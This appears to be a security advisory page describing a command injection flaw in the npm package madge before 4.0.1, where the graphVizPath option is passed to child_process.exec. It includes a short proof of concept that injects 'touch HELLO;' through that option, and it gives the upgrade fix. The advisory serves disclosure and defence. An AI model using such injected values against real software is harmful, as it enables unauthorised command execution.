Vulnerability	Vulnerable Version
H Command Injection madge is a Madge is a developer tool for generating a visual graph of your module dependencies, finding circular dependencies, and give you other useful info. Affected versions of this package are vulnerable to Command Injection. It is possible to specify a custom Graphviz path via the `graphVizPath` option parameter which when the `.image()`, `.svg()` or `.dot()` functions are called, is executed by the `childprocess.exec` function. PoC 1. install `madge` module: `npm i madge` 2. run the following poc.js: // Example taken from: https://github.com/pahen/madge#svg const madge = require('madge'); madge('..', {graphVizPath: "touch HELLO;"}) .then((res) => res.svg()) .then((writtenImagePath) => { console.log('Image written to ' + writtenImagePath); }); How to fix Command Injection? Upgrade `madge` to version 4.0.1 or higher.	<4.0.1

Command Injection

madge is a Madge is a developer tool for generating a visual graph of your module dependencies, finding circular dependencies, and give you other useful info.

Affected versions of this package are vulnerable to Command Injection. It is possible to specify a custom Graphviz path via the graphVizPath option parameter which when the .image(), .svg() or .dot() functions are called, is executed by the childprocess.exec function.

PoC

1. install `madge` module: `npm i madge`
2. run the following poc.js:

// Example taken from: https://github.com/pahen/madge#svg

const madge = require('madge');
madge('..', {graphVizPath: "touch HELLO;"})
.then((res) => res.svg())
.then((writtenImagePath) => {
console.log('Image written to ' + writtenImagePath);
});

How to fix Command Injection?

Upgrade madge to version 4.0.1 or higher.

<4.0.1

Go back to all versions of this package